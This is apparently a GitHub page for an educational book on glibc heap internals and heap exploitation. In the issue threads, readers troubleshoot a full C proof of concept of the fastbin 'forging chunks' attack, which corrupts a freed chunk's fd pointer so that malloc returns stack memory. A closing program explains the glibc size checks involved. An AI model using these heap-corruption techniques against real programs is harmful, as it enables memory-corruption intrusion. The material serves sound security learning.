dhavalkapil / heap-exploitation

This book on heap exploitation is a guide to understanding the internals of glibc's heap and various attacks possible on the heap structure.

Home Page: https://heap-exploitation.dhavalkapil.com/

Language: C (100.00%)
Topics: book, heap, security

heap-exploitation's Introduction

Heap Exploitation

This short book is written for people who want to understand the internals of 'heap memory', particularly the implementation of glibc's 'malloc' and 'free' procedures, and also for security researchers who want to get started in the field of heap exploitation.

The first section of the book covers an in-depth, yet concise, description about heap internals. The second section covers some of the most famous attacks. It is assumed that the reader is unfamiliar with this topic. For experienced readers, this text might be good for a quick revision.

Read for free online (recommended) or download the PDF or ePUB or Mobi/Kindle editions.

Citing heap-exploitation

If you use this book in your research, please use the following BibTeX entry:

@software{dhaval_kapil_2022_6450612,
  author       = {Dhaval Kapil},
  title        = {DhavalKapil/heap-exploitation},
  month        = apr,
  year         = 2022,
  publisher    = {Zenodo},
  version      = {v1.0.0},
  doi          = {10.5281/zenodo.6450612},
  url          = {https://doi.org/10.5281/zenodo.6450612}
}

Creative Commons License

This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

heap-exploitation's People

Contributors

ashishhacker, dhavalkapil, integeruser, janniskirschner, jwilk, kibouo, tkeetch


heap-exploitation's Issues

forging chunk issues

Hi! I am trying "forging chunks" on an x64 machine, Ubuntu 18.04.2 LTS.

This is the code I am executing, plus some printf calls for debugging.

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv) {

  struct forged_chunk {
    size_t prev_size;
    size_t size;
    struct forged_chunk *fd;
    struct forged_chunk *bck;
    char buf[10];               // padding
  };

  // First grab a fast chunk
  char *a = malloc(10);               // 'a' points to 0x219c010

  printf("a: %p\n", a);

  // Create a forged chunk on the stack
  struct forged_chunk chunk;    // At address 0x7ffc6de96690
  printf("chunk: %p\n", &chunk);
  chunk.size = 0x20;            // This size should fall in the same fastbin
  char* data = (char *)&chunk.fd;     // Data starts here for an allocated chunk
  strcpy(data, "attacker's data");
  printf("data %p\n", data);

  // Put the fast chunk back into fastbin
  free(a);
  // Modify 'fd' pointer of 'a' to point to our forged chunk
  *((unsigned long long *)a) = (unsigned long long)&chunk;
  // Remove 'a' from HEAD of fastbin
  // Our forged chunk will now be at the HEAD of fastbin
  char* aa = malloc(10);                   // Will return 0x219c010
  printf("aa: %p\n", aa);

  char* victim = malloc(10);          // Points to 0x7ffc6de966a0
  printf("victim: %p\n", victim);     // Print the returned pointer itself, not the address of the local variable 'victim'
  printf("%s\n", victim);       // Prints "attacker's data" !!

  return 0;
}

While this is the output:

a: 0x5646ebdb2260
chunk: 0x7ffff376dff0
data 0x7ffff376e000
aa: 0x5646ebdb2260
victim: 0x7ffff376dfd0
�

But the victim address is not aligned as expected.

Do you have any idea?

clarification on "victim" symbol

I've noticed it's not very clear, at first, when you use the name "victim" in the first chapters of the book referring to the malloc-ed chunk. I had to search a bit to find out you have used this name with the same meaning of the one used in the black hat's paper you referenced in the first pages. I think it would be better if you added a paragraph explaining victim = malloc(0xbadc0de) or something like that.

Forging chunks example not working

I guess this line is not correct anymore:
https://github.com/DhavalKapil/heap-exploitation/blame/master/attacks/forging_chunks.md#L51

At least I needed to change the following line in the example:
chunk.size = 0x20;
to:
chunk.size = 0x11;

to be able to test this.

Info about package installed:

Package: libc6-i386
Status: install ok installed
Priority: optional
Section: libs
Installed-Size: 10187
Maintainer: Ubuntu Developers <[email protected]>
Architecture: amd64
Source: glibc
Version: 2.23-0ubuntu10
Replaces: libc6-dev-i386
Depends: libc6 (= 2.23-0ubuntu10)
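Both forging-chunks issues above come down to the size field that glibc's fastbin path validates. The following C program is an added example (not from the book or either issue poster) that re-implements the relevant malloc.c arithmetic (request2size, chunksize, fastbin_index) for x86-64 and i386 builds and shows why a forged size of 0x20 is accepted on x86-64 while an i386 build needs 0x10 with PREV_INUSE set, i.e. 0x11. The abi_t table and fastbin_size_check_passes are names introduced here, not glibc identifiers.

```c
#include <stdio.h>
#include <stddef.h>

/* Build parameters taken from glibc's malloc.c; abi_t is a name used only here. */
typedef struct {
    const char *name;
    size_t size_sz;     /* SIZE_SZ: sizeof(INTERNAL_SIZE_T)                  */
    size_t alignment;   /* MALLOC_ALIGNMENT                                   */
    size_t min_chunk;   /* MIN_CHUNK_SIZE: offset of fd_nextsize in malloc_chunk */
} abi_t;

static const abi_t X86_64 = { "x86-64", 8, 16, 32 };
static const abi_t I386   = { "i386",   4,  8, 16 };

/* glibc's request2size(): user request -> chunk size including the size field. */
static size_t request2size(const abi_t *a, size_t req) {
    size_t mask = a->alignment - 1;
    size_t minsize = (a->min_chunk + mask) & ~mask;            /* MINSIZE */
    if (req + a->size_sz + mask < minsize) return minsize;
    return (req + a->size_sz + mask) & ~mask;
}

/* glibc's chunksize(): strip PREV_INUSE, IS_MMAPPED and NON_MAIN_ARENA bits. */
static size_t chunksize(size_t size_field) { return size_field & ~(size_t)7; }

/* glibc's fastbin_index(): which fastbin a chunk of this size belongs to. */
static unsigned fastbin_index(const abi_t *a, size_t sz) {
    return (unsigned)(sz >> (a->size_sz == 8 ? 4 : 3)) - 2;
}

/* The consistency check _int_malloc applies before handing out a fastbin chunk:
   the size field of the chunk at the head of the bin must map back to the bin
   being serviced, otherwise glibc aborts with "malloc(): memory corruption (fast)".
   Returns 1 if a chunk carrying `forged_size` would pass for a request of `req`. */
static int fastbin_size_check_passes(const abi_t *a, size_t req, size_t forged_size) {
    unsigned idx = fastbin_index(a, request2size(a, req));
    return fastbin_index(a, chunksize(forged_size)) == idx;
}

int main(void) {
    printf("x86-64 malloc(10) -> chunk size 0x%zx\n", request2size(&X86_64, 10));
    printf("i386   malloc(10) -> chunk size 0x%zx\n", request2size(&I386, 10));
    printf("size field 0x20 accepted on x86-64: %d, on i386: %d\n",
           fastbin_size_check_passes(&X86_64, 10, 0x20),
           fastbin_size_check_passes(&I386, 10, 0x20));
    printf("size field 0x11 accepted on i386: %d\n",
           fastbin_size_check_passes(&I386, 10, 0x11));
    return 0;
}
```

On Ubuntu 18.04 (glibc 2.27) a freed small chunk goes to tcache before any fastbin, and the 2.27 tcache path applies no such size check and stores a pointer to the next chunk's user data rather than its header, so the first issue's run never reaches the fastbin check modelled here.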
